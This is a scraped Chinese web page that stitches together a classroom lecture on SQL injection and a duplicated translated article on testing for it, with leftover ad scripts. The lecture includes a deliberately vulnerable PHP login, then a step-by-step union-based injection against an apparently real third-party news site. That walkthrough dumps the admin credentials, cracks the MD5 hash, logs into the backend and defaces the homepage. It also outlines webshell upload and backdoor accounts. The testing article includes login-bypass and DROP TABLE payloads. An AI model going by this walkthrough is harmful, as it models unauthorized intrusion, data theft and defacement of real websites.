如何测试WEB应用程序java 防止sql注入攻击击

Web安全篇之SQL注入攻击
&大家早上好!今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:
& & &&&第一讲:&纸上谈兵:我们需要在本地架设注入环境,构造注入语句,了解注入原理。&;
& &&&&&第二讲:&实战演练:我们要在互联网上随机对网站进行友情检测,活学活用,举一反三&;
&&&&&&&第三讲:&扩展内容:挂马,提权,留门。此讲内容颇具危害性,不予演示。仅作概述&。
& &&这个主题涉及的东西还是比较多的,结合我们前期所学。主要是让大家切身体会一下,管中窥豹,起到知己知彼的作用。千里之堤溃于蚁穴,以后进入单位,从事相关程序开发,一定要谨小慎微。
问:大家知道骇客们攻击网站主要有哪些手法? &&
&&&&& SQL注入,旁注,XSS跨站,COOKIE欺骗,DDOS,0day 漏洞,社会工程学 等等等等,只要有数据交互,就会存在被入侵风险!哪怕你把网线拔掉,物理隔绝,我还可以利用传感器捕捉电磁辐射信号转换成模拟图像。你把门锁上,我就爬窗户;你把窗户关上,我就翻院墙;你把院墙加高,我就挖地洞。。。道高一尺魔高一丈,我始终坚信计算机不存在绝对的安全,你攻我防,此消彼长,有时候,魔与道只在一念之间。
& & 下面,就让我们一起推开计算机中那另一扇不为人知的门---
&&&一、纸上谈兵
&&&(一)了解注入原理
&&&&为什么会存在sql注入呢,只能说SQL出身不好。因为sql作为一种解释型语言,在运行时是由一个运行时组件解释语言代码并执行其中包含的指令的语言。基于这种执行方式,产生了一系列叫做代码注入(code injection)的漏洞 。它的数据其实是由程序员编写的代码和用户提交的数据共同组成的。程序员在web开发时,没有过滤敏感字符,绑定变量,导致攻击者可以通过sql灵活多变的语法,构造精心巧妙的语句,不择手段,达成目的,或者通过系统报错,返回对自己有用的信息。
&&&&我们在学JDBC和SQL时,讲师跟我们说 Statement不能防止SQL注入, PreparedStatement能够防止SQL注入. 没错, 这句话是没有问题的, 但到底如何进行SQL注入?怎么直观的去了解SQL注入?这还是需要花一定的时间去实验的.预编译语句java.sql.PreparedStatement ,扩展自 Statement,不但具有 Statement 的所有能力而且具有更强大的功能。不同的是,PreparedStatement 是在创建语句对象的同时给出要执行的sql语句。这样,sql语句就会被系统进行预编译,执行的速度会有所增加,尤其是在执行大语句的时候,效果更加理想。而且PreparedStatement中绑定的sql语句是可以带参数的。
&&&(二)架设注入环境
&&&&我们知道现在php作为一门网页编程语言真是风生水起,利用lamp(linux+apache+mysql+php)或者wamp(windows+apache+mysql+php)搭建网站环境,如腾讯的discuz、阿里的 phpwind 以及织梦的dedecms 等建站程序,占据了国内网站的半壁江山。那么我们今天即以这种架构为假象敌,首先是在本地架设wamp环境。需要用到的工具有:apache,mysql,php ,这几个组件可以单独下载安装,不过安装配置过程较为繁琐,还是建议新手直接从网上下载phpnow ,一个绿色程序,包含上述三个组件,傻瓜化操作就可以了。
&&&&& 然后呢,我们要建立测试用的数据表,编写html,php,文件,通过实例具体来演示通过SQL注入,登入后台管理员界面。这里,我之前已经写好了,大家看下:
1.创建一张试验用的数据表:
CREATE TABLE users (
  id int(11) NOT NULL AUTO_INCREMENT,
  username varchar(64) NOT NULL,
  password varchar(64) NOT NULL,
  email varchar(64) NOT NULL,
  PRIMARY KEY (id),
  UNIQUE KEY username (username)
  添加一条记录用于测试:
  INSERT INTO users (username,password,email)
  VALUES('tarena',md5('admin'),'');
2.接下来,贴上登录界面的源代码:
&title&Sql注入演示&/title&
&meta http-equiv=&content-type& content=&text/charset=utf-8&&
&form action=&validate.php& method=&post&&
&fieldset &
&legend&Sql注入演示&/legend&
&td&用户名:&/td&
&td&&input type=&text& name=&username&&&/td&
&td&密&&码:&/td&
&td&&input type=&text& name=&password&&&/td&
&td&&input type=&submit& value=&提交&&&/td&
&td&&input type=&reset& value=&重置&&&/td&
&/fieldset&
当用户点击提交按钮的时候,将会把表单数据提交给validate.php页面,validate.php页面用来判断用户输入的用户名和密码有没有都符合要求(这一步至关重要,也往往是SQL漏洞所在)。
3.验证模块代码如下:
&title&登录验证&/title&
&meta http-equiv=&content-type& content=&text/charset=utf-8&&
$conn=@mysql_connect(&localhost&,'root','') or die(&数据库连接失败!&);;
mysql_select_db(&injection&,$conn) or die(&您要选择的数据库不存在&);
$name=$_POST['username'];
$pwd=$_POST['password'];
$sql=&select * from users where username='$name' and password='$pwd'&;
$query=mysql_query($sql);
$arr=mysql_fetch_array($query);
if(is_array($arr)){
header(&Location:manager.php&);
echo &您的用户名或密码输入有误,&a href=\&Login.php\&&请重新登录!&/a&&;
&&&&注意到了没有,我们直接将用户提交过来的数据(用户名和密码)直接拿去执行,并没有实现进行特殊字符过滤,待会你们将明白,这是致命的。
  代码分析:如果,用户名和密码都匹配成功的话,将跳转到管理员操作界面(manager.php),不成功,则给出友好提示信息。
&&&(三)演示注入手法  
  到这里,前期工作已经做好了,我们看这个登录界面,虽说是简陋了点。但具有一般登录认证的功能。普通人看这个不过是一个登录界面,但从攻击者角度来说,透过现象看本质,我们应当意识到隐藏在这个登录页面背后的是一条select 语句---
  OK! 接下来将展开我们的重头戏:SQL注入
  填好正确的用户名(tarena)和密码(admin)后,点击提交,将会返回给我们&欢迎管理员&的界面。
  因为根据我们提交的用户名和密码被合成到SQL查询语句当中之后是这样的:
  &&&&select * from users where username='tarena' and password=md5('admin')
  很明显,用户名和密码都和我们之前给出的一样,肯定能够成功登陆。但是,如果我们输入一个错误的用户名或密码呢?很明显,肯定登入不了吧。恩,正常情况下是如此,但是对于有SQL注入漏洞的网站来说,只要构造个特殊的&字符串&,照样能够成功登录。
  比如:在用户名输入框中输入:&or 1=1#,密码随便输入,这时候的合成后的SQL查询语句为:
  &&&&select * from users where username='' or 1=1#' and password=md5('')
  语义分析:&#&在mysql中是注释符,这样井号后面的内容将被mysql视为注释内容,这样就不会去执行了,换句话说,以下的两句sql语句等价:
  &&&&select * from users where username='' or 1=1#' and password=md5('')
  等价于
  &&&&select * from users where username='' or 1=1
  因为1=1永远都是成立的,即where子句总是为真,将该sql进一步简化之后,等价如下select语句:
  &&&&select * from users
  没错,该sql语句的作用是检索users表中的所有字段
& & 果不其然,我们利用万能语句(&or 1=1#)能够登录!看到了吧,一个经构造后的sql语句竟有如此可怕的破坏力,相信你看到这后,开始对sql注入有了一个理性的认识了吧~
&&&&二、实战演练
&&&&OK,前面铺垫了那么多,算是给大家科普了。现在我们进行第二讲,实战演练。开始之前呢,有一个互动环节。现在请大家用自己的手机登录 http://www.guoshang.tk &这个网址,简单看下。待会等我们注入攻击之后,再次登录,好对比效果,对于sql注入攻击有一个更加直观的认识。
&&&(一)积极备战&
&&&&1。首先设置浏览器,工具--internet选项--安全--找到&显示友好的http信息&,把前面的勾去掉;
&&&&2。打开谷歌,寻找注入点。为了节省时间,这里我已经事先找好目标点
& & & & & & & &&http://www.guoshang.tk;
&&&&& &谷歌搜索小技巧:筛选关键字:&inurl:/news/read.php?id=&
&&&(二)狼烟四起
&&&&1。我们打开这个网址,一个新闻网站,,我们点击[百家争鸣]板块,这是一个国内外新闻速览的栏目,好多时政的帖子,我们点击一个,OK,现在进入单个帖子界面,首先我们看下当前帖子的URL地址,
&&&&&&&&http://www.guoshang.tk/news/read.php?id=50
&&&&可以看出这是一个动态URL,也就是说可以在地址栏中传参,这是SQL注入的基本条件。
&&&&2。判断是否存在sql注入可能。在帖子地址后面空上一格,敲入 and 1=1 ,然后 and 1=2 。这两句什么意思呢? 一个恒等式,一个恒不等式,敲入&and 1=1 帖子返回正常, and 1=2 时帖子返回出错,说明sql语句被执行,程序没有对敏感字符进行过滤。现在我们可以确定此处是一个SQL注入点,程序对带入的参数没有做任何处理,直接带到数据库的查询语句中。可以推断出在访问
&&&&&&&&http://www.guoshang.tk/news/read.php?id=50
&&&&时数据库中执行的SQL语句大概是这样的:&
&&&&&&&&Select * from [表名] where id=50&
&&&&添加and 1=1后的SQL语句:&
&&&&&&&&Select * from [表名] where id=50 and 1=1&&&
&&&&&&&&由于条件and 1=1永远为真,所以返回的页面和正常页面是一致的&
&&&&添加and 1=2后的SQL语句:&
&&&&&&&&Select * from [表名] where id=50 and 1=2&&&
&&&&&&&&由于条件1=2永远为假,所以返回的页面和正常页面不一致&
&&&&3。爆数据库。确定注入点仅仅意味着开始。现在,我们回到原先的帖子地址:
&&&&&&&&&&&&http://www.guoshang.tk/news/read.php?id=50 &
&&&&&&&现在要判断数据库类型以及版本,构造语句如下:
&&&&&&&&&&&&http://www.guoshang.tk/news/read.php?id=50 and ord(mid(version(),1,1))&51&
&&&&&&&&&&&&发现返回正常页面,说明数据库是mysql,并且版本大于4.0,支持union查询,反之是4.0
&&&&&&&&&&&&以下版本或者其他类型数据库。&
&&&&4。爆字段。接着我们再构造如下语句来猜表中字段:&
&&&&&&&&&&&&a. http://www.guoshang.tk/news/read.php?id=50 order by 10&& &
&&&&&&&&&&&&返回错误页面,说明字段小于10&
&&&&&&&&&&&&b. http://www.guoshang.tk/news/read.php?id=50 order by 5&& &
&&&&&&&&&&&&返回正常页面,说明字段介于5和10之间&
&&&&&&&&&&&&c. http://www.guoshang.tk/news/read.php?id=50 order by 7&& &
&&&&&&&&&&&&返回错误页面,说明字段大于5小于7,可以判断字段数是6.下面我们再来确认一下&
&&&&&&&&&&&&d. http://www.guoshang.tk/news/read.php?id=50 order by 6&& &&
&&&&&&&&返回正常页面,说明字段确实是6这里采用了&二分查找法&,这样可以减少判断次数,节省时间。如果采用从order by 1依次增加数值的方法来判断,需要7次才可以确定字段数,采用&二分查找法&只需要4次就够。当字段数很大时,二分查找法的优势更加明显,效率更高。&
&&&&5。爆表.确定字段之后现在我们要构造联合查询语句(union select ),语句如下:&&&&&
&&&&&&&&&&&http://www.guoshang.tk/news/read.php?id=50 and 1=2 union select 1,2,3,4,5,6&&&
&&&&&&&&我们来看帖子页面,原先内容没有了,取而代之的是返回给了我们 三个数字,分别是3,5,6 我们随便选择一个,这里的3,5,6指的是我们可以把联合查询的对应位置替换为 我们想要查询的关键字,比如版本,数据库名称,主要是用来探测web系统的信息。
&&&&6。爆用户名、密码。我们选择3 吧,OK,现在把3给替换掉,先查询下数据库库名,构造语句如下
& & & & & &http://www.guoshang.tk/news/read.php?id=50 and 1=2 union select &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& & & & & & & & & & & & & & & & &1,2,database(),4,5,6&&&&&
&&&&&&&&&&&浏览器给我们返回了 xinwen &。说明这个网站 的数据库库名是 xinwen &.&
&&&&&&&现在我们用同样的手法查询下 管理员信息 ,构造语句如下:
&&&&& & &&&http://www.guoshang.tk/news/read.php?id=50 and 1=2 union select &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&1,2,user(),4,5,6
& & & & & &返回 root@localhost ,是个管理员权限。
&&&&&&&现在我们再用同样的手法查询用户名,密码,构造语句如下:
&&&&&&&&&&&&http://www.guoshang.tk/news/read.php?id=50 and 1=2 union select
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&1,2,username,4,5,6 from admin&
&&&&&&&&&&&&返回 admin
&&&&&&&&&&&&http://www.guoshang.tk/news/read.php?id=50 and 1=2 union select& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&1,2,password,4,5,6 from admin
&&&&&&&&&&&&返回 B2E5B76793EDA91AA3A400 &
&&&&7。md5解密。看到这里,有的同学可能会有点紧张。其实返回的这个是字符串密码经过32位md5加密后的值。上次李翊大帝给我们复习的时候 讲过加密与解密。也稍稍提到了md5 摘要算法,不可逆。话虽如此,现在互联网上crack md5 &解密&md5 的网站很多,这里我给解密加了引号,是因为其&解密&原理是 md5 值既然不能进行 逆向破解,但是同样的字符串经过同样的md5加密算法所生成的md5值是一样的,我们可以重新构造字符串生成md5值,然后对比两个值,如果一样则字符串一样。有人说,这种方法岂不是海底捞针,试到猴年马月去啊,其实不然,互联网云时代已经到来,大数据的信息挖掘以及分布式运算可以解决很多类似大运算量的问题。我们现在就要来对这个md5值进行比对,有好多网站提供这种服务,我们找一个。(.cn&) 这个网址,我们把这个值复制进去,然后点击&MD5 CRACK&,&解密&时间,视密码复杂度而定,OK,结果出来,(chinaadmin)
&&&&8。登录后台。现在我们已经拿到网站的管理员帐号密码,感谢上帝,一路顺风,但还不能高兴得太早。很多情况是你虽然拿到了钥匙,但是找不到门。下面我们就来找一下门,找之前要有个基本思路:
&&&&&&&①先试下几个比较常用的目录;
&&&&&&&②不行的话,因为这个论坛程序是dedecms5.6 ,所以我们就到 织梦官方,下载一套同样程序,& &&&&&&&&&分析网站管理路径,或者直接百度&dedecms默认管理界面&即可,下载步骤可省略;
&&&&&&&③手工不通,借力工具。明小子,啊D,御剑,都可以。
&&&&9。这里我们发现此网站依然采用程序默认管理路径:
&&&&&&&&&&&&http://www.guoshang.tk/dede&
&&&&&&&&&&&&输入用户名&admin&,密码&chinaadmin&成功登入。
&&&&&&&&接下来,我们找到【核心】--【附件管理】--【文件式管理器】--这时我们可以看到网站根目录下所有目录以及文件,下标栏还有几个功能选项,我们可以看到网站首页文件【index.html】,点击【修改】,进入网页源代码编辑模式,删除所有源码(这招有点毒,劝告别改人家的源码,建议新建一个文件),留个言,表示到此一游。
&&&&&&&&&&&&卑鄙是卑鄙者的通行证,高尚是高尚者的墓志铭----- 北岛
&&&&&&&&现在是见证奇迹的时刻!请大家再次登录这个网站,有没有把你和你的小伙伴们惊呆呢?!
&&&&&&&&至此,战斗结束。若干年的免费住宿,一日三餐在向你招手。。。
&&&三、扩展部分
& &鉴于此讲内容危害性较大,不予演示。只简述其流程。
& &(一)webshell提权
&&&&& & 二讲结束,我们仅仅取得网站管理员权限,操作范围仅限当前网站。革命尚未成功,同志仍需努力。若想深入挖掘,则必须寻求更大突破。获得网站webshell .
&&&&&&&&①准备一个php网马。(网上泛滥成灾,自己下载。但要注重分辨,小心螳螂捕蝉黄雀在后);
&&&&& &&②登录网站后台--【核心】--【附件管理】--【文件式管理器】--选择下标栏中的【文件上传
&&&&&&&&&&选项,上传我们实现准备的php网马文件(tarena.php);
&&&&&&&&③上传完毕,点击预览,记录下url地址。新建浏览器窗口,复制粘贴,打开之后,可以看到我们的网马成功挂载,输入密码tarena(密码可以自行用记事本打开修改编辑);
&&&&&&&&④进入网马管理界面,你会被那华丽丽的操作选项惊呆了!(取决网马水平,小马就别谈了,这里指的是大马)。从程序目录-网站根目录-各种强大的功能,乃至直接操作服务器磁盘文件,获取各种系统信息,跃马扬鞭,如入无人之境。其破坏力之大,令人咂舌!所以拜托各位亲,一定要盗亦有道,手下留情,除了靠法律监管,也要靠个人道德约束。
& &(二)暗修栈道
&&&&& & 浴血奋战、攻城拔寨之后,怎样保卫来之不易的胜利果实?政治治大国若烹小鲜,入侵则烹小鲜如治大国。为长远计,我们需要建立一种长期和肉鸡保持联系的机制。而且还要很隐蔽,毕竟这是见不得光的。留后门的方法诸多:
&&&&&&&&①开启telnet服务&&&&&
&&&&&&&&&& 建立匿名账户,添加至超级管理员组;
&&&&&&&&②开启远程终端服务;
&&&&&&&&&&&&&③自制木马触发事件...
&&&&& & 因系统平台而异,这里不再赘言。
①可能有读者会觉得此文很假,的确,鉴于篇幅问题,文中目标站点是我事先踩点过的,所以才
& & & & 会一路凯歌,事实上很少会有站点会如此理想,但万变不离其宗,只是时间问题罢了。
&&&&&&②文中所述演示环境建立在同时满足两个条件下:
&&&&&&&& &&1.php配置文件中魔术引号已关闭;
&&&&&&&& &&2.建站程序中没有对用户输入字符进行过滤。
&&&&&&实际生活中,类似的SQL注入漏洞已是明日黄花,国内大大小小的网站都已经补上漏洞。但,百密必有一疏,入侵是偶然的,但安全绝对不是必然的。笔者曾在晨讲之前利用了一天的时间,采取手工加工具的手段批量扫描了一批站点,并最终成功攻克一百有余。其中SQL注入漏洞确实很少,但各类0day漏洞层出不穷,更为严重的是后者比前者更加致命,互联网的高速发展给人们带来便利的同时也潜伏着非常多的风险,目前国内领域人才缺口非常大!希望达内能够审时度势,占领市场先机,早日开设网络安全专业,为社会经济建设保驾护航
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'如何测试WEB应用程序防止SQL注入攻击
  在WEB应用程序的中,是非常重要的一部分,但常常容易被忽视掉。在安全测试中,防止注入攻击尤其重要。本文介绍了SQL注入攻击产生的后果以及如何进行测试。
  关键字:安全测试
SQL 注入攻击 防火墙
  正文:
  WEB应用程序的安全测试,防止SQL注入攻击,下面举一些简单的例子加以解释。——Inder P Singh。
  许多应用程序运用了某一类型的。测试下的应用程序有一个接受用户输入的用户界面,这些输入值用来执行下列任务。
  给用户显示相关的存储数据。例如,程序通过用户输入的登录信息检查用户凭证(权限),从而只显示相关的功能和数据。
  将用户输入的数据存储到数据库中。例如,用户填写了一张表格并提交,程序立即将之存储到数据库中;从而,用户可以在本次会话和下次会话中获取这些数据。
  一些用户输入值可能会被接下来程序将执行的SQL语句运用到,而程序有可能不会正确执行用户输入的值。如果是这样的话,蓄意用户可以向程序提供非法数据,这些数据接下来被运用到框架中并且用来在数据库中执行SQL语句。这就是SQL注入。该行为的结果令人鸣起警钟。
  SQL注入可能导致以下结果:
  用户可以以另一用户的身份登录到程序,甚至是管理员的身份。
  用户可以看到其他用户的隐私信息,如其他用户的简介细节,交易细节。
  用户可以修改应用程序配置信息以及其他用户的数据。
  用户可以修改数据库的结构,甚至是删除应用数据库中的表格。
  用户可以控制数据库服务器并且按照自己意愿随意执行命令。
  因为允许SQL注入的结果是相当严重的,所以在应用程序的安全测试阶段应对SQL注入进行测试。通过对SQL注入技术有一个总体的概括,让我们来理解一些SQL注入的实际例子!
  重点:SQL注入问题只能在测试环境中测试
  若应用程序页面有登录功能,程序有可能使用如下所示的动态SQL语句。这条语句本应从用户表中返回至少一条用户详细信息作为结果,当SQL语句中含有输入的用户名和密码时。
FROM Users WHERE User_Name = ‘” & strUserName & “‘ AND
Password = ‘” & strPassword & “’;”
 如果测试人员输入John作为用户名(用户名文本框),输入Smith作为密码(密码文本框),上述SQL语句就变成:
FROM Users WHERE User_Name = ‘John’ AND Password = ‘Smith’
  如果测试人员输入John’-作为用户名,不输入密码,那么SQL语句变成:
FROM Users WHERE User_Name = ‘John’& AND Password = ‘’;
  我们可以注意到,SQL语句中John后面的部分成为了注释。如果用户表中有一些用户用户名为“John”,那么程序能够允许测试人员以用户John的身份登录,这样,测试人员可以看到用户John的隐私信息。
  如果测试人员不知道任何程序中已存在的用户该怎么办呢?在这种情况下,测试人员可以尝试相似的用户名像“admin”,“administrator”,“sysadmin”。如果这些用户名在数据库中都不存在,测试人员可以输入John’
or ‘x’=’x作为用户名,Smith’ or ‘x’=’x作为密码。那么SQL语句如以下所示:
FROM Users WHERE User_Name = ‘John’ or ‘x’='x’ AND Password =
‘Smith’ or ‘x’=’x’;
  因为‘x’=’x’这一条件总是成立的,结果集包含用户表中所有行。程序允许测试人员以用户表中第一个用户的身份登录进去。
  重点:测试人员在尝试下列SQL注入之前应该请求拥有数据库管理员或者开发人员权限以备份有问题的表格。
  如果测试人员输入John’; DROP table
users_’—作为用户名,任意值作为密码,那么SQL语句如下所示:
FROM Users WHERE User_Name = ‘John’; DROP table users_’ &‘
AND Password = ‘Smith’;
  这条语句将造成表格“users_details”从数据库中永久删除。
  虽然上述例子说明的是页面中登录功能上运用SQL注入技术,但是测试人员应在应用程序中所有接受用户输入的页面运用该技术测试,如搜索页面,反馈页面等等。
  SQL注入可能出现在运用了SSL的程序中,即使是防火墙也不能防御SQL注入攻击。
  本文中,我尽量以简单的形式解释SQL注入技术。再次强调,SQL注入只能在测试环境中测试,不能再开发环境,生产环境或者其他任何环境下测试。除了手工测试程序是否易受SQL注入攻击,我们还应该使用web
vulnerability scanner(一款扫描工具)来检查SQL注入。
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。您的位置: &
ASP.NET Web应用程序中SQL注入攻击的防范研究
优质期刊推荐& & & & 摘要:& & 在WEB应用程序的&软件测试&中,&安全测试&是非常重要的一部分,但常常容易被忽视掉。在安全测试中,防止&SQL&注入攻击尤其重要。本文介绍了SQL注入攻击产生的后果以及如何进行测试。& & 关键字:&安全测试 SQL 注入攻击 防火墙& & 正文:& & WEB应用程序的安全测试,防止SQL注入攻击,下面举一些简单的例子加以解释。&&Inder P Singh。& & 许多应用程序运用了某一类型的&数据库&。测试下的应用程序有一个接受用户输入的用户界面,这些输入值用来执行下列任务。& & 给用户显示相关的存储数据。例如,程序通过用户输入的登录信息检查用户凭证(权限),从而只显示相关的功能和数据。& & 将用户输入的数据存储到数据库中。例如,用户填写了一张表格并提交,程序立即将之存储到数据库中;从而,用户可以在本次会话和下次会话中获取这些数据。& & 一些用户输入值可能会被接下来程序将执行的SQL语句运用到,而程序有可能不会正确执行用户输入的值。如果是这样的话,蓄意用户可以向程序提供非法数据,这些数据接下来被运用到框架中并且用来在数据库中执行SQL语句。这就是SQL注入。该行为的结果令人鸣起警钟。& & SQL注入可能导致以下结果:& & 用户可以以另一用户的身份登录到程序,甚至是管理员的身份。& & 用户可以看到其他用户的隐私信息,如其他用户的简介细节,交易细节。& & 用户可以修改应用程序配置信息以及其他用户的数据。& & 用户可以修改数据库的结构,甚至是删除应用数据库中的表格。& & 用户可以控制数据库服务器并且按照自己意愿随意执行命令。& & 因为允许SQL注入的结果是相当严重的,所以在应用程序的安全测试阶段应对SQL注入进行测试。通过对SQL注入技术有一个总体的概括,让我们来理解一些SQL注入的实际例子!& & 重点:SQL注入问题只能在测试环境中测试& & 若应用程序页面有登录功能,程序有可能使用如下所示的动态SQL语句。这条语句本应从用户表中返回至少一条用户详细信息作为结果,当SQL语句中含有输入的用户名和密码时。SELECT * FROM Users WHERE User_Name = && & strUserName & && AND Password = && & strPassword & &&;&& & 如果测试人员输入John作为用户名(用户名文本框),输入Smith作为密码(密码文本框),上述SQL语句就变成:SELECT * FROM Users WHERE User_Name = &John& AND Password = &Smith&& & 如果测试人员输入John&-作为用户名,不输入密码,那么SQL语句变成:SELECT * FROM Users WHERE User_Name = &John&& AND Password = &&;& & 我们可以注意到,SQL语句中John后面的部分成为了注释。如果用户表中有一些用户用户名为&John&,那么程序能够允许测试人员以用户John的身份登录,这样,测试人员可以看到用户John的隐私信息。& & 如果测试人员不知道任何程序中已存在的用户该怎么办呢?在这种情况下,测试人员可以尝试相似的用户名像&admin&,&administrator&,&sysadmin&。如果这些用户名在数据库中都不存在,测试人员可以输入John& or &x&=&x作为用户名,Smith& or &x&=&x作为密码。那么SQL语句如以下所示:SELECT * FROM Users WHERE User_Name = &John& or &x&='x& AND Password = &Smith& or &x&=&x&;& & 因为&x&=&x&这一条件总是成立的,结果集包含用户表中所有行。程序允许测试人员以用户表中第一个用户的身份登录进去。& & 重点:测试人员在尝试下列SQL注入之前应该请求拥有数据库管理员或者开发人员权限以备份有问题的表格。& & 如果测试人员输入John&; DROP table users_&&作为用户名,任意值作为密码,那么SQL语句如下所示:SELECT * FROM Users WHERE User_Name = &John&; DROP table users_& && AND Password = &Smith&;& & 这条语句将造成表格&users_details&从数据库中永久删除。& & 虽然上述例子说明的是页面中登录功能上运用SQL注入技术,但是测试人员应在应用程序中所有接受用户输入的页面运用该技术测试,如搜索页面,反馈页面等等。& & SQL注入可能出现在运用了SSL的程序中,即使是防火墙也不能防御SQL注入攻击。& & 本文中,我尽量以简单的形式解释SQL注入技术。再次强调,SQL注入只能在测试环境中测试,不能再开发环境,生产环境或者其他任何环境下测试。除了手工测试程序是否易受SQL注入攻击,我们还应该使用web vulnerability scanner(一款扫描工具)来检查SQL注入。& & ​
声明:该文章系网友上传分享,此内容仅代表网友个人经验或观点,不代表本网站立场和观点;若未进行原创声明,则表明该文章系转载自互联网;若该文章内容涉嫌侵权,请及时向
上一篇:下一篇:
相关经验教程
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益

我要回帖

更多关于 防止注入式攻击 的文章

 

随机推荐